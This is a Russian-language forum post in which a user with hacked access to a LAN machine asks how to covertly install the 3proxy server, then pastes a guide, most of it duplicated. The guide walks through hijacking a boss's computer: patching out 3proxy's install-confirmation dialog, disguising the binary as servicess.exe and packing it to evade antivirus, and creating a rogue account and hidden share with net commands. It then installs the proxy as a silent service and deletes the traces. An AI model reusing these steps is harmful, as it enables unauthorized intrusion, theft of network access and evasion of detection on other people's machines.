Итак, имеется взломанная в локальной сети машина, доступ с помощью radmin'a.
Подскажите пожалуйста, как удаленно установить 3proxy, чтобы заюзать халявный инет, и естественно чтобы не с палиться.
Вот нашел мануал как это сделать, но я не знаю как его с компилить.
Пособие для захвата чужого трафика С улыбкой.
Ситуацию, в которую я попал и для чего я это делал, была описана в самом начале. Естественно вся конфигурация сети и названия портов были изменены (на всякий случай).
Для тех, кто решит повторить все, что здесь написано: все действия сначала проводите на проверенной удаленной машине, что бы «обкатать» все действия и не запалить себя.
Что у меня было? Был удаленный шелл на машине начальника (как я его получил, это вопрос не по теме). Была сконфигурирована на виртуальной машине операционка похожая на удаленную, на которой я проводил свои испытания.
Что мне нужно было? Мне нужно было удаленно поставить какой нибудь прокси и у себя в браузере прописать этот прокси и нужный порт.
Распишу по этапам, как я действовал:
1) нужно было выбрать прокси
2) замаскировать прокси
3) настроить прокси
4) удаленно залить прокси на «другую» машину (далее по тексту, я так буду называть компьютер начальника)
5) удаленно запустить прокси (желательно как сервис)
6) подчистить следы
7) настроить свой браузер
Здорово все, ёоу С улыбкой
Теперь подробнее о каждом действии:
1) Сначала я по инерции выбрал то, что лежало на моей машине, а именно – Proxomitron. Его свойства – удобный графический интерфейс (в данном случае это было недостатком), блокировка банеров и много всяких других наворотов. Если его запускать из шелла, то он не работает, и к тому же появляется в списке задач, что не есть гуд.
После небольших поисков по инету я наткнулся на ES Proxy. Поначалу я не понял, как программа работает, потому, что если ее запускать просто так из командной строки, то она ничего не выдает. С сайта изготовителя я нашел инструкции по настройке и установке программы. Сразу скажу, что у нее много достоинств (читайте на сайте изготовителя), но и есть недостатки, по котором мне пришлось отказаться от нее. Первый и самый важный недостаток – она отказалась работать на другой машине, хотя в моем эмуляторе все работало нормально и она перенаправляла трафик. С чем это было связано, я так и не мог выяснить, хотя настраивал ее по минимуму, то есть все разрешал и ничего не запрещал. Естественно мне нужна была стабильность, а ее не было. Второй минус программы, это то, что при инсталляции ее, как сервиса, она сама себя устанавливает в каталог винды, причем под своим нормальным именем и создает несколько длинных файлов (я так понимаю временных), которые очень сильно выделяются из общей массы. Вот, например:
esps4_save_routers_data.dat
esps4_save_server_params.dat
Хоть в этих файлах ничего нет, но все равно любой мала-мальский пользователь увидев их, сразу найдет и прокси и его настройки, в которых указаны разрешенные адреса, а это значит, что могут запалить.
После небольших обсуждений в этом форуме мне любезно предложили использовать программу 3Proxy. Сразу скажу, что программ эта примерно такого же уровня, что и ES Proxy, но у нее есть ряд достоинств, которые мне понравились:
- ее можно переименовать и устанавливать в переименованном виде.
- запускается с файлом настроек, который мы сами указываем и делаем.
- есть исходные коды (которые мне пригодились).
Из недостатков хочу отметить, ее длинное имя в списке сервисов (хотя мне кажется, это можно поправить) и что при установке ее сервисом, она выдает окно с вопросом «установить меня (да/нет)». Конечно при легальной установке, это безразлично, но при удаленной установке это недопустимо, хотя я обошел это препятствие (читайте дальше).
На этом этапе я остановил свой выбор на последней программе 3Proxy.
2) Что бы программа не определялась никаким антивирусом, ее нужно замаскировать. Перед тем, как маскировать программу, мне нужно было убрать сообщение «установить меня (да/нет)» в исходном коде программы и скомпилировать.
Скачав исходники, я начал их изучение. После 3 минут беглого просмотра текста в файле 3proxy.c я увидел следующие строки:
if((argc == 2 || argc == 3)&& !strcmp((char *)argv[1], "--install")) {
sprintf((char *)tmpbuf, "%s will be installed and started.n"
"By clicking Yes you confirm you read and accepted License greement.n"
"You can use Administration/Services to control %s service.",
stringtable[1], stringtable[2]);
if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;
*tmpbuf = '\"';
…………}
Для тех, кто плохо разбирается в языке «С» поясню:
В первой строке проверяется наличие параметров в командной строке и сравнение их с шаблоном, то есть, что бы установить программу как сервис, нужно написать:
3proxy.exe --install 3proxy.cfg
Нетрудно видеть, что если программа устанавливается как сервис, то первый аргумент должен быть –install. Если это условие выполняется, то мы выполняем все что находится между {}.
Смотрим вторую строчку, и что мы видим? А видим мы формирование надписи, которое выскакивает при установке программы, как сервиса. Теперь смотрим на третью строку и видим команду создания того самого окна с надписью, которая была сделана во второй строке. Теперь поясню, что она делает.
В этой строке происходит проверка, какая была нажата клавиша в окне с запросом и если не была нажата клавиша YES (да), то программа просто заканчивается (return 1). Что бы не выводить этого, можно просто заремировать данную строку и программа и программа просто установит себя как сервис без всяких запросов. После правки кода, данная строка должна выглядеть так:
//if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;
Теперь нужно скомпилировать программу. Как это делается. Для начала, нужно, что бы был компилятор, я использовал Visual C++ 6.0. Для него набираем команду:
nmake /f Makefile.msvc.
После этого нужно подождать около минуты, пока файлы скомпилируются и соберутся. Сразу скажу, у меня компилятор сначала не хотел работать, из за того, что я его криво когда-то установил. То есть пути к нему не были прописаны, и пришлось все собирать вручную. Пыхтел я больше часа, потом плюнул и установил в виртуальной машине с нуля Visual C++ 6.0 и скомпилировал там за одну минуту.
После компиляции в каталоге с исходниками создаются exe файлы. Берем оттуда 3Proxy.exe и переименовываем его в что нибудь незаметное, например servicess.exe. Проверяем его антивирусом и что мы видим, KAV ругается, а DR.Web нет. ладно, есть много способов обмануть антивирус. Первое упаковываем его программным архиватором, который не понимает антивирус (типа PE Compact или что нибудь экзотическое). Второе можно подменить заголовки упаковщиков и третье, дизассемблировать программу и исправить точку входа. Последним пунктом я не разу не пользовался (не приходилось, хотя пару статей про то, как это сделать, где то есть на компе). Я применил первый вариант, его хватило, что бы KAV вообще не замечал этой программы.
3) Для того, что бы прокси работал, нужно создать файл настроек. Самый простой файл будет иметь всего три строки:
auth none
log
proxy
поясняю, первой строкой мы авторизируем всех, второй строкой выводим лог на экран, третьей заставляем работать прокси на стандартном порту 3128. Так, теперь мы открываем блокнот и пишем там свой файл, который нужен нам:
service
auth none
allow *
proxy –p3050
поясняю, первой строкой мы говорим, что прокси работает сервисом, второй, что нам не нужна авторизация, третьей и четвертой мы говорим, что прокси нужно работать на 3050 порту. Все сохраняем файл в servicess.сfg
теперь у нас два файла, которые будут нужны на удаленной машине:
servicess.exe
servicess.cfg
4) Заливаем прокси на другую машину. Сразу скажу, что мне это труда не составило, так как весь отдел имеет внутренние папки для обмена информацией. То есть на каждой машине создается папка «общая» и разшаривается для всех. Я просто скопировал два файла в эту папку и в шелле набрал следущее:
cd\
cd c:\общая
move servicess.exe c:\windowssystem32\servicess.exe
move servicess.cfg c:\windowssystem32\servicess.cfg
Поясняю, первой строкой я перешел в корень на диск С. Второй строкой я перешел в папку «общая». Третьей и четвертой строкой я переместил файлы в каталог c:\windows\system32\
Для тех, кто не имеет доступа к машине, есть два способа залить файлы:
- создать пользователя и расшарить папку.
- через ftp залить программы
сразу скажу, что вторым способом я пользуюсь редко, обычно первый проходит без проблем.
Рассмотрим первый способ:
Для начала создаем пользователя на удаленной машине, через шелл:
Net user add 123 /add
Мы создали пользователя add с паролем 123
Теперь набираем команды:
cd\
dir /ad
первую команду я описывал, а вторая показывает список каталогов
выбираем из этого списка самый неприметный каталог и расшариваем его командой (для примера я выбрал каталог C:\musik)
net share musik=c:\musik
внимание, не берите общесистемные каталоги, они могут быть уже расшариные и тогда команда net share вернет ошибку.
После всех манипуляций, если мы не знаем имя компьютера, который ломаем, то набираем ipconfig, для того, что бы посмотреть IP адрес жертвы (допустим он такой 10.3.1.1).
Теперь заходим на удаленный компьютер. У себя набираем
\\10.3.1.1\music
И поле запроса логина и пароля вбиваем add и 123. после этого заливаем в эту папку два наших файла и переносим их куда нибудь в незаметное место, типа c:\windows\system32\ командами с шела:
cd\
cd c:\music
move servicess.exe c:\windows\system32\servicess.exe
move servicess.cfg c:\windows\system32\servicess.cfg
5) Удаленно запускаем прокси, как сервис:
cd\
cd c:\windows\system32
servicess.exe --install servicess.cfg
если все нормально, то программа ничего не выдаст, а сканер покажет, что на удаленной машине открылся порт 3050.
6) Подчищаем следы. Если вы создавали пользователи и расшаривали папку, то нужно все вернуть на место, а именно в шелле нужно набрать:
net user add /delete
net share musik /delete
7) Настраиваем свой браузер. Заходим в настроки, там в прокси и прописывам адрес прокси 10.3.1.1 и порт 3050.
Кто сможет сделать proxy без этого окна, с запросом при установке как сервиса,
пожалуйста выложите его сюда!
Подскажите пожалуйста, как удаленно установить 3proxy, чтобы заюзать халявный инет, и естественно чтобы не с палиться.
Вот нашел мануал как это сделать, но я не знаю как его с компилить.
Пособие для захвата чужого трафика С улыбкой.
Ситуацию, в которую я попал и для чего я это делал, была описана в самом начале. Естественно вся конфигурация сети и названия портов были изменены (на всякий случай).
Для тех, кто решит повторить все, что здесь написано: все действия сначала проводите на проверенной удаленной машине, что бы «обкатать» все действия и не запалить себя.
Что у меня было? Был удаленный шелл на машине начальника (как я его получил, это вопрос не по теме). Была сконфигурирована на виртуальной машине операционка похожая на удаленную, на которой я проводил свои испытания.
Что мне нужно было? Мне нужно было удаленно поставить какой нибудь прокси и у себя в браузере прописать этот прокси и нужный порт.
Распишу по этапам, как я действовал:
1) нужно было выбрать прокси
2) замаскировать прокси
3) настроить прокси
4) удаленно залить прокси на «другую» машину (далее по тексту, я так буду называть компьютер начальника)
5) удаленно запустить прокси (желательно как сервис)
6) подчистить следы
7) настроить свой браузер
Здорово все, ёоу С улыбкой
Теперь подробнее о каждом действии:
1) Сначала я по инерции выбрал то, что лежало на моей машине, а именно – Proxomitron. Его свойства – удобный графический интерфейс (в данном случае это было недостатком), блокировка банеров и много всяких других наворотов. Если его запускать из шелла, то он не работает, и к тому же появляется в списке задач, что не есть гуд.
После небольших поисков по инету я наткнулся на ES Proxy. Поначалу я не понял, как программа работает, потому, что если ее запускать просто так из командной строки, то она ничего не выдает. С сайта изготовителя я нашел инструкции по настройке и установке программы. Сразу скажу, что у нее много достоинств (читайте на сайте изготовителя), но и есть недостатки, по котором мне пришлось отказаться от нее. Первый и самый важный недостаток – она отказалась работать на другой машине, хотя в моем эмуляторе все работало нормально и она перенаправляла трафик. С чем это было связано, я так и не мог выяснить, хотя настраивал ее по минимуму, то есть все разрешал и ничего не запрещал. Естественно мне нужна была стабильность, а ее не было. Второй минус программы, это то, что при инсталляции ее, как сервиса, она сама себя устанавливает в каталог винды, причем под своим нормальным именем и создает несколько длинных файлов (я так понимаю временных), которые очень сильно выделяются из общей массы. Вот, например:
esps4_save_routers_data.dat
esps4_save_server_params.dat
Хоть в этих файлах ничего нет, но все равно любой мала-мальский пользователь увидев их, сразу найдет и прокси и его настройки, в которых указаны разрешенные адреса, а это значит, что могут запалить.
После небольших обсуждений в этом форуме мне любезно предложили использовать программу 3Proxy. Сразу скажу, что программ эта примерно такого же уровня, что и ES Proxy, но у нее есть ряд достоинств, которые мне понравились:
- ее можно переименовать и устанавливать в переименованном виде.
- запускается с файлом настроек, который мы сами указываем и делаем.
- есть исходные коды (которые мне пригодились).
Из недостатков хочу отметить, ее длинное имя в списке сервисов (хотя мне кажется, это можно поправить) и что при установке ее сервисом, она выдает окно с вопросом «установить меня (да/нет)». Конечно при легальной установке, это безразлично, но при удаленной установке это недопустимо, хотя я обошел это препятствие (читайте дальше).
На этом этапе я остановил свой выбор на последней программе 3Proxy.
2) Что бы программа не определялась никаким антивирусом, ее нужно замаскировать. Перед тем, как маскировать программу, мне нужно было убрать сообщение «установить меня (да/нет)» в исходном коде программы и скомпилировать.
Скачав исходники, я начал их изучение. После 3 минут беглого просмотра текста в файле 3proxy.c я увидел следующие строки:
if((argc == 2 || argc == 3)&& !strcmp((char *)argv[1], "--install")) {
sprintf((char *)tmpbuf, "%s will be installed and started.n"
"By clicking Yes you confirm you read and accepted License greement.n"
"You can use Administration/Services to control %s service.",
stringtable[1], stringtable[2]);
if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;
*tmpbuf = '\"';
…………}
Для тех, кто плохо разбирается в языке «С» поясню:
В первой строке проверяется наличие параметров в командной строке и сравнение их с шаблоном, то есть, что бы установить программу как сервис, нужно написать:
3proxy.exe --install 3proxy.cfg
Нетрудно видеть, что если программа устанавливается как сервис, то первый аргумент должен быть –install. Если это условие выполняется, то мы выполняем все что находится между {}.
Смотрим вторую строчку, и что мы видим? А видим мы формирование надписи, которое выскакивает при установке программы, как сервиса. Теперь смотрим на третью строку и видим команду создания того самого окна с надписью, которая была сделана во второй строке. Теперь поясню, что она делает.
В этой строке происходит проверка, какая была нажата клавиша в окне с запросом и если не была нажата клавиша YES (да), то программа просто заканчивается (return 1). Что бы не выводить этого, можно просто заремировать данную строку и программа и программа просто установит себя как сервис без всяких запросов. После правки кода, данная строка должна выглядеть так:
//if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO | MB_ICONASTERISK) != IDYES) return 1;
Теперь нужно скомпилировать программу. Как это делается. Для начала, нужно, что бы был компилятор, я использовал Visual C++ 6.0. Для него набираем команду:
nmake /f Makefile.msvc.
После этого нужно подождать около минуты, пока файлы скомпилируются и соберутся. Сразу скажу, у меня компилятор сначала не хотел работать, из за того, что я его криво когда-то установил. То есть пути к нему не были прописаны, и пришлось все собирать вручную. Пыхтел я больше часа, потом плюнул и установил в виртуальной машине с нуля Visual C++ 6.0 и скомпилировал там за одну минуту.
После компиляции в каталоге с исходниками создаются exe файлы. Берем оттуда 3Proxy.exe и переименовываем его в что нибудь незаметное, например servicess.exe. Проверяем его антивирусом и что мы видим, KAV ругается, а DR.Web нет. ладно, есть много способов обмануть антивирус. Первое упаковываем его программным архиватором, который не понимает антивирус (типа PE Compact или что нибудь экзотическое). Второе можно подменить заголовки упаковщиков и третье, дизассемблировать программу и исправить точку входа. Последним пунктом я не разу не пользовался (не приходилось, хотя пару статей про то, как это сделать, где то есть на компе). Я применил первый вариант, его хватило, что бы KAV вообще не замечал этой программы.
3) Для того, что бы прокси работал, нужно создать файл настроек. Самый простой файл будет иметь всего три строки:
auth none
log
proxy
поясняю, первой строкой мы авторизируем всех, второй строкой выводим лог на экран, третьей заставляем работать прокси на стандартном порту 3128. Так, теперь мы открываем блокнот и пишем там свой файл, который нужен нам:
service
auth none
allow *
proxy –p3050
поясняю, первой строкой мы говорим, что прокси работает сервисом, второй, что нам не нужна авторизация, третьей и четвертой мы говорим, что прокси нужно работать на 3050 порту. Все сохраняем файл в servicess.сfg
теперь у нас два файла, которые будут нужны на удаленной машине:
servicess.exe
servicess.cfg
4) Заливаем прокси на другую машину. Сразу скажу, что мне это труда не составило, так как весь отдел имеет внутренние папки для обмена информацией. То есть на каждой машине создается папка «общая» и разшаривается для всех. Я просто скопировал два файла в эту папку и в шелле набрал следущее:
cd\
cd c:\общая
move servicess.exe c:\windowssystem32\servicess.exe
move servicess.cfg c:\windowssystem32\servicess.cfg
Поясняю, первой строкой я перешел в корень на диск С. Второй строкой я перешел в папку «общая». Третьей и четвертой строкой я переместил файлы в каталог c:\windows\system32\
Для тех, кто не имеет доступа к машине, есть два способа залить файлы:
- создать пользователя и расшарить папку.
- через ftp залить программы
сразу скажу, что вторым способом я пользуюсь редко, обычно первый проходит без проблем.
Рассмотрим первый способ:
Для начала создаем пользователя на удаленной машине, через шелл:
Net user add 123 /add
Мы создали пользователя add с паролем 123
Теперь набираем команды:
cd\
dir /ad
первую команду я описывал, а вторая показывает список каталогов
выбираем из этого списка самый неприметный каталог и расшариваем его командой (для примера я выбрал каталог C:\musik)
net share musik=c:\musik
внимание, не берите общесистемные каталоги, они могут быть уже расшариные и тогда команда net share вернет ошибку.
После всех манипуляций, если мы не знаем имя компьютера, который ломаем, то набираем ipconfig, для того, что бы посмотреть IP адрес жертвы (допустим он такой 10.3.1.1).
Теперь заходим на удаленный компьютер. У себя набираем
\\10.3.1.1\music
И поле запроса логина и пароля вбиваем add и 123. после этого заливаем в эту папку два наших файла и переносим их куда нибудь в незаметное место, типа c:\windows\system32\ командами с шела:
cd\
cd c:\music
move servicess.exe c:\windows\system32\servicess.exe
move servicess.cfg c:\windows\system32\servicess.cfg
5) Удаленно запускаем прокси, как сервис:
cd\
cd c:\windows\system32
servicess.exe --install servicess.cfg
если все нормально, то программа ничего не выдаст, а сканер покажет, что на удаленной машине открылся порт 3050.
6) Подчищаем следы. Если вы создавали пользователи и расшаривали папку, то нужно все вернуть на место, а именно в шелле нужно набрать:
net user add /delete
net share musik /delete
7) Настраиваем свой браузер. Заходим в настроки, там в прокси и прописывам адрес прокси 10.3.1.1 и порт 3050.
Кто сможет сделать proxy без этого окна, с запросом при установке как сервиса,
пожалуйста выложите его сюда!